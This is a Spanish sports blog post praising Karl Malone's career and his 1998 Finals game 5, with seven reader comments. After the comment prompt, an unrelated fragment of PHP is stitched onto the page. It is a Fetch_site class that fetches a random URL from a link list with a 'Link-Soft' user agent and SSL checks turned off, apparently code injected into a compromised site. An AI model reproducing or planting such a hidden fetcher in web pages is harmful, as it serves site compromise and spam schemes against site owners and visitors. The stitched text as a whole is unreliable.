El cartero… sin Pablo Neruda

31 de December de 2012 por TheDeerHunter

Me encontraba devanándome los sesos, buscando algún histórico partido de entre una larga y tentadora lista de nombres para escribir un nuevo artículo cuando algunos visitantes decidisteis incendiar el viejo artículo de los 10 mejores power forwards, que recibió más visitas que nunca en sus tres años de historia (aprovecho para recomendar toda la serie). Por el debate suscitado, y por el título, imagino que los más avispados ya sabrán de quién vamos a hablar.

Confieso que Karl Malone siempre me cayó como una patada en los mismos y que su juego es posiblemente el menos plástico que haya visto nunca (a estos niveles). ¿Arte? ¿Poesía? El “practicismo” más repugnante. Visto un partido suyo, vistos todos… y levantarnos del asiento, en rara ocasión, si es que te pilla despistado. Que me parta un rayo si no entiendo que cada uno tenga otros favoritos.

Sin embargo, por lo leído, crece la sensación de que la memoria comienza a fallar tras casi diez años desde su retirada. En ocasiones uno se ve obligado a hacer de abogado del diablo… pero es que el diablo era él.

Alguno pensaréis que hay unas cuantas repetidas. No, es que jugaba así el tipo. ¿Cansino? Pues también, bastante…

Antes del advenimiento de Tim Duncan -y del éxito en torno suyo de una de las más grandes dinastías de todos los tiempos– no había mucha gente que pusiera en duda que era él el mejor ala-pívot de la historia. Añado que no imagino a nadie más perfecto para la posición. Un físico increíble, de peso adecuado, inmenso reboteador, juego al poste imparable, rango de tiro a media distancia… Un mal nacido ofensivo y defensivo. Individualmente hay muy pocos (o ninguno) defectos que reprocharle y sus logros individuales están ahí, ojo: 2 MVPs, 11 veces quinteto ideal, 3 en el defensivo, Dream Team, Hall of Famer, 14 veces All-Star…

Pero lo verdaderamente increíble es que fue un monstruo durante 19 años seguidos. Podéis visualizar una comparativa a mi modo de ver bastante ilustrativa aquí referida a la estadística “win shares”. Sí, hay gente que ha cuajado campañas más “pasote” que él, pero a lo largo del tiempo… ni Duncan. No hay punto de comparación en sus casi dos décadas de excelencia. En este punto sólo le puede mirar a la cara Kareem y punto.

Por su puesto, su gran pecado y por la que será recordado siempre es la falta de anillos en sus dedos. Mi modesta opinión es que ha habido muy pocas franquicias más humildes que los Jazz y muy pocas bandas más infames que aquella que hayan pisado, no ya las finales, sino los playoffs, en la historia de la liga. Sí, sí… una pasada Stockton, por supuesto, y un Hornacek que habría que contextualizar. Habituales como Bryon Russell o Ostertag que hasta parecían piezas útiles, Adam Keefe, Greg Foster, Antoine Carr, Shandon Anderson, Eisley… estos son los figuras que se enfrentaron al más grande. Podéis repasar el resto de plantillas de las que disfrutaron los Jazz en otras ocasiones. Ponderamos poco los milagros que llevaron a cabo Sloan, Malone y Stockton a lo largo de los años.

Y todo este rollo para ver a Malone en acción. No es fácil elegir un partido en especial. Él era más de ir cada día a la oficina que de actuaciones rimbombantes. Me quedo con el que para mí fue el mejor Malone, el que le puso las cosas más difíciles a Jordan de lo que indica la historia. El 5º de las finales de 1998, cuando se cargó a su hundido equipo a las espaldas para complicar mucho la cosa. Una exhibición contra su némesis Rodman. De paso podemos recordarlo como uno de los duelos míticos entre Power Forwards que hayan visto nuestros ojos. No ha llovido tanto.

Me quedo con ese saltito hacia atrás, marca registrada. Un lanzamiento único que en su caso podríamos considerar como una de las acciones más indefendibles de todos los tiempos. Juego de pies no tenía mucho… ni falta que le hacía por lo dicho. A destacar también cómo un interior debe tomar la posición al poste. Aquí no hago comparaciones para no herir…

Y bonus: dándole de “leches” al Gusano y a Hulk Hogan. Sin comentarios.

Comenta

7 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Es curioso que el paso del tiempo afecta de manera muy diferente a la opinión que se tiene sobre los jugadores. A algunos los idealizamos hasta el extremo, a otros los hacemos de menos. Sí que parece que con Malone tendemos a lo segundo, posiblemente por haber acabado su carrera sin anillo y vinculado a otros dos monstruos como Stockton y Sloan.

    Pero vaya, que era de lo mejor que ha habido. Mi opinión se resume en: “qué asco daba y qué bueno era”.

    Ah, enhorabuena por el magnífico artículo.

      Citar

  2. Viva_Dirk dice:
    #2

    El problema para Malone es ‘como se ha puesto el patio’. Garnett y Nowitzki han conseguido su anillo, en el caso del 2º con MVP de las finales incluido, y eso es algo que da mucho peso en la historia, no para decir que son mejores que Karl pero tampoco se puede decir ya lo contrario sin esperar réplica.

    Al contrario que a la mayoria personalmente no me cayó muy mal y creo que se le infravalora en cuanto a espectacular, por ahí sus mates no tienen nada que envidiar a los de Blake Griffin y siempre fue un buen showman. Hablando puramente de su juego para mi siempre sera uno de los jugadores mas definitivos cerca del aro, se las apañaba para que la bola acabara dentro de totas todas.

      Citar

  3. Denise dice:
    #3

    Agggg que pena la derrota de los Magic ante los todopoderosos Heat, gracias a un pase blandito de lado a lado de Redick que roba Wade.
    Coloso Vucevic haciendo historia alcanzando la cifra del 20-29 (record de la franquicia en rebotes).
    Una lástima para los Magic, que tras una racha de 7 partidos ganados de los últimos 10, cuando tenían los Play-offs a mano, haya llegado las lesiones de Davis y Nelson, y estén cosechando 6 derrotas consecutivas que hacen que se esfumen sus opciones de Playoffs. Lo que mas rabia da, es que salvo la abultada derrota vs Raptors, el margen de derrota de los otros 5 partidos es de 4 puntos de media por partido, hecho que demuestra la falta de un jugador franquicia que decida y resuelva en los momentos finales.
    Y ahora viene Bulls y Knicks…casi nada

      Citar

  4. nba dice:
    #4

    Es que para valorar al “cartero” en toda su dimension habria que tener en cuenta a los mitos contra los que se ha tenido que enfrentar y, en que determinadas ocasiones le ha privado de obtener su merecido anillo.
    Es que me lo imagino en la liga actual,

      Citar

  5. nba dice:
    #5

    y me imagino a Howard intentando pararle y lo mas probable es que Howard tuviese que pedir un cargamento especial de “dodotis” por las galletas que le iban a caer intentando parar al “angelito” del cartero

      Citar

  6. Viva_Dirk dice:
    #6

    Bueno, eso es una excusa como otra cualquiera. En el momento de Malone los ala-pivots jugaban muy cerca del aro, tampoco sería facil para el defender a jugadores que pueden anotar desde la larga distancia.

    Todos los que ganan un anillo se enfrentan a mitos.

      Citar

  7. Gusanote dice:
    #7

    Fue y sera el JUGADOR MAS SOBREVALORADO DE LA HISTORIA….llego ha un equipo CAMPEON,L.A.LAKERS,que junto a su aporte y del “Guante”mas Kobe y Shaq,NO tenian rivales en la liga…..y me hace acordar al Capitan del TITANIC….LO LLEVO AL NAUFRAGIO….,sin comentar la FAMOSA perdida en la cual LA HISTORIA castiga B.R…..pero el verdadero culpable fue el CARTERO..,ademas de llevar consigo al mejor base puro a las derrotas(STOCK) que siempre levanto su nivel de juego en los Playoffs ..y LO PEOR LE ESPERA EN CASA…..cuando su hija SACA HA RELUCIR SU ANILLO DE CAMPEONA de la WNBA……y le pregunta¿cuantos tienes de estos en tu mano?….con todo esto, es lamentable que alguien CREA QUE ES MAS QUE TIM DUNCAN.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>